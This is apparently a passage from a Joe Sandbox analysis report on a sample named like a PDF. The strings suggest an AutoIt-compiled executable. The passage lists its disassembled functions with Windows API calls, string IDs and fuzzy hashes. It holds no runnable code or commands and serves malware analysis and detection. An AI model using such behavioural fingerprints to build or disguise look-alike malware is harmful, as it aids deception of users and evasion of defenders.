                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 613575ea2876c95b02a88ad9af1726552efee208a21df340be8180c70fe67480
                                                    • Instruction ID: df33ad8a3a4eab4ab9e9d3e3e94c5273caec0617b04fb07e5605059e06e74d24
                                                    • Opcode Fuzzy Hash: 613575ea2876c95b02a88ad9af1726552efee208a21df340be8180c70fe67480
                                                    • Instruction Fuzzy Hash: 76E01AB1100204EFDB025F709848E6E7BACEB4C355F118825FD9ACB221CB75A8409B40
                                                    Function 0037B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0037B2DF
                                                    • UnloadUserProfile.USERENV(?,?), ref: 0037B2EB
                                                    • CloseHandle.KERNEL32(?), ref: 0037B2F4
                                                    • CloseHandle.KERNEL32(?), ref: 0037B2FC
                                                      • Part of subcall function 0037AB24: GetProcessHeap.KERNEL32(00000000,?,0037A848), ref: 0037AB2B
                                                      • Part of subcall function 0037AB24: HeapFree.KERNEL32(00000000), ref: 0037AB32
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: b08538f6c5a149fbe855996855f6fdf94dbb9b2897c017b5741fb8fe8e71620e
                                                    • Instruction ID: 38eacd0ce628d480388eaae9e7e9039930095baad2c9deef7950416482dc1b81
                                                    • Opcode Fuzzy Hash: b08538f6c5a149fbe855996855f6fdf94dbb9b2897c017b5741fb8fe8e71620e
                                                    • Instruction Fuzzy Hash: 36E0263A104405BBDB026FA5EC08C59FBAAFF993217108631F625C15B5CB36B871EB91
                                                    Function 003BB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: ac3c629356bc00e2f9a4b9514c55a76bb97dbd5614db2a078b5b41b275aabdb3
                                                    • Instruction ID: 55cd22d27efabb7015a962392549f67b402dc50ae1bd761079e4d0ebd1d028d2
                                                    • Opcode Fuzzy Hash: ac3c629356bc00e2f9a4b9514c55a76bb97dbd5614db2a078b5b41b275aabdb3
                                                    • Instruction Fuzzy Hash: 51E012B1500200AFDB025F709848A297BA8EB4C355F118829FD9ACB221CB79A840CB00
                                                    Function 0037DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0037DEAA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 3565006973-3941886329
                                                    • Opcode ID: 1c937879842d8d0f3603b8b41e59d9d5f437606eb47d06cb246f287c5305b471
                                                    • Instruction ID: bf3732f05c99c679e314c52ed655088ab0d490a94d1d8bb91616bbeb2c173290
                                                    • Opcode Fuzzy Hash: 1c937879842d8d0f3603b8b41e59d9d5f437606eb47d06cb246f287c5305b471
                                                    • Instruction Fuzzy Hash: E7913674600601AFDB26DF64C884E6AB7B9AF48710B14846EF94ACF691DB75E841CB60
                                                    Function 0038DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035C6F4: _wcscpy.LIBCMT ref: 0035C717
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • __wcsnicmp.LIBCMT ref: 0038DEFD
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0038DFC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: 5d4075e89c999ddf898adc3dfc7382ad592b1cde0a013c0fbde569673ba0915c
                                                    • Instruction ID: f9856f660bd552b7441e9579e3ed1261b8abbd0a75f332fd8c451cb2d31ea9ae
                                                    • Opcode Fuzzy Hash: 5d4075e89c999ddf898adc3dfc7382ad592b1cde0a013c0fbde569673ba0915c
                                                    • Instruction Fuzzy Hash: 56618375A00215AFCB16EF98C891EAEB7F8FF48710F0544AAF546AF291D770AE44CB50
                                                    Function 0038290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy
                                                    • String ID: I/;$I/;
                                                    • API String ID: 3048848545-2683866831
                                                    • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                    • Instruction ID: a5a031551f8fa2e1d78096cf6436df358d5b9109dc6a718d3c76aca4664eaa24
                                                    • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                    • Instruction Fuzzy Hash: 6D41D631900316AACF2BFF98C4419FEB7B4EF49310F51509AE881AB191DB34AE92C760
                                                    Function 0035BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 0035BCDA
                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0035BCF3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: da344042abf9430102b7605ff5b60c1442714176eb53342f26ba091fbce16fb3
                                                    • Instruction ID: 75dbea775128eac3cda09baf4ac5d15af68d362fcaaa98dfab1b604933904097
                                                    • Opcode Fuzzy Hash: da344042abf9430102b7605ff5b60c1442714176eb53342f26ba091fbce16fb3
                                                    • Instruction Fuzzy Hash: E8513071408B449BE321AF14D886FABBBECFB95355F41484EF5C8821B2EB7084ACC756
                                                    Function 0038C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003444ED: __fread_nolock.LIBCMT ref: 0034450B
                                                    • _wcscmp.LIBCMT ref: 0038C65D
                                                    • _wcscmp.LIBCMT ref: 0038C670
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: a29b4e5887e86201b4b5ad54644945f581e890a7e9ca31794a05fa2dfc2f1257
                                                    • Instruction ID: 8beeeed1acc7390e2867f49f93006b5b690ff31fbec3948ffd8acca798489871
                                                    • Opcode Fuzzy Hash: a29b4e5887e86201b4b5ad54644945f581e890a7e9ca31794a05fa2dfc2f1257
                                                    • Instruction Fuzzy Hash: FB41B572A0020ABADF22AAA4DC41FEF77B9EF49714F014479F605EF181D671AA048B61
                                                    Function 003AA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 003AA85A
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003AA86F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 2fd2b00990d15303bd007cfaf9828bc81263980a1e41705fbd0cc973845d3ad3
                                                    • Instruction ID: cb096f471f8fd1662aae4099965fdb7bfc376ea4f7072a64013e3c241f44a7b1
                                                    • Opcode Fuzzy Hash: 2fd2b00990d15303bd007cfaf9828bc81263980a1e41705fbd0cc973845d3ad3
                                                    • Instruction Fuzzy Hash: EC410775E017099FDB55CFA8C880BEA7BB9FB09300F11016AE905EB391D775A942CFA1
                                                    Function 003A975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 003A980E
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003A984A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 3e159daf655d8e2f3858e3ffa1dab6e1c7dc26090cef41fbd502401777d3e7b5
                                                    • Instruction ID: 6d61365def4418526b220d198d2e039eb885eadc718959cdd40630c2a9a31ea9
                                                    • Opcode Fuzzy Hash: 3e159daf655d8e2f3858e3ffa1dab6e1c7dc26090cef41fbd502401777d3e7b5
                                                    • Instruction Fuzzy Hash: F7317C71110604AAEB129F78CC80FFB77ADFF5A760F11861AF9A9D7190CA35AC81C760
                                                    Function 00385157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 003851C6
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00385201
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: 3fc0cddbf8c0b76b43e3aabe207add97b298e5813d4ad4c374c3d0064ef686f6
                                                    • Instruction ID: a221480185b6b91eb9bbaa6c81da97c383e6de6eb73d6921a8f45b091eda49e4
                                                    • Opcode Fuzzy Hash: 3fc0cddbf8c0b76b43e3aabe207add97b298e5813d4ad4c374c3d0064ef686f6
                                                    • Instruction Fuzzy Hash: 8C31F831600704DFEB27EF99D845BAEBBF9FF45350F1548A9E981E61A0DB709A44CB10
                                                    Function 0039658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf
                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                    • API String ID: 2391506597-2584243854
                                                    • Opcode ID: c97a2be187e3935b6035f64290a7e492c38d20d045ef40af9cb04e3138665bad
                                                    • Instruction ID: 7583226aa67b3b019592567377da97e8c3d5eb4e01fea001fc536aca5deb1bcb
                                                    • Opcode Fuzzy Hash: c97a2be187e3935b6035f64290a7e492c38d20d045ef40af9cb04e3138665bad
                                                    • Instruction Fuzzy Hash: B4218D71A01218AFCF12EFA4C882EEE77B4AF45740F004469F505AF192DB74EA45CBA1
                                                    Function 003A93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003A945C
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003A9467
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 3a93ddffc8e0279c24a8a37289aa70b8699969f4664dfaec54c151bca32ce3cf
                                                    • Instruction ID: c1f912d311ef5a5e1c44edf510da18047ca04ef74ee43711da1878ead34d7a52
                                                    • Opcode Fuzzy Hash: 3a93ddffc8e0279c24a8a37289aa70b8699969f4664dfaec54c151bca32ce3cf
                                                    • Instruction Fuzzy Hash: 4711B6713001086FEF12DE55DC80FBB376EEB4A3A4F110126F914AB2E0D6359C528760
                                                    Function 003ADA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • GetActiveWindow.USER32 ref: 003ADA7B
                                                    • EnumChildWindows.USER32(?,003AD75F,00000000), ref: 003ADAF5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ActiveChildEnumLongWindows
                                                    • String ID: T19
                                                    • API String ID: 3814560230-229429444
                                                    • Opcode ID: 77496d52e427691cce357aac4a1d7d60c8e190a0441d19c03433f82fcfe5f3fb
                                                    • Instruction ID: 1d0575a093b9042e3b146d6f59bf858af23ee004953e046d3f54da22c2989389
                                                    • Opcode Fuzzy Hash: 77496d52e427691cce357aac4a1d7d60c8e190a0441d19c03433f82fcfe5f3fb
                                                    • Instruction Fuzzy Hash: A7212F75204201DFC716DF28D950AA5B7E9EF5A320F250A29F966977F0DB31A800CF64
                                                    Function 003A98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                                      • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                                      • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                                    • GetWindowRect.USER32(00000000,?), ref: 003A9968
                                                    • GetSysColor.USER32(00000012), ref: 003A9982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    • Opcode ID: 2964f31eb3825280818abf395b2589a6e9103c4b0eeed7b9f92980b22e25d573
                                                    • Instruction ID: f87fb799bb2250212c0d4ba5728531e7088ae941c902c3059e41511c7f38cd7a
                                                    • Opcode Fuzzy Hash: 2964f31eb3825280818abf395b2589a6e9103c4b0eeed7b9f92980b22e25d573
                                                    • Instruction Fuzzy Hash: 26112672520209AFDB16DFB8CC45EEA7BA8FB09344F014A2DF955E2250E735E851DB60
                                                    Function 003A9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 003A9699
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003A96A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 06e5565cf3a252fd789d934dd5a3827818b01eaa6bc15c61be8b8fc033078a21
                                                    • Instruction ID: 231b6ba8f42e42a62d55792bfb258a699e93681c298f285b116eb2b9f6ce7351
                                                    • Opcode Fuzzy Hash: 06e5565cf3a252fd789d934dd5a3827818b01eaa6bc15c61be8b8fc033078a21
                                                    • Instruction Fuzzy Hash: EF115871500108AAEB125F689C44FEB3B6EEF0A378F514726F965A61E0C735AC519760
                                                    Function 00385262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 003852D5
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003852F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: d7d6a554926e78bb56ab073f87f89f960dd659c9086f2200822f478055f01498
                                                    • Instruction ID: 0dadf9f83e03a374b5c719bceb5fe5d411d50b73da38200abb2edde94cec3386
                                                    • Opcode Fuzzy Hash: d7d6a554926e78bb56ab073f87f89f960dd659c9086f2200822f478055f01498
                                                    • Instruction Fuzzy Hash: 8511E27B901714EBDB22FB98D944F9D77B8AB05790F0600A5E981E72A0D7B0EE04C791
                                                    Function 00394D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00394DF5
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00394E1E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
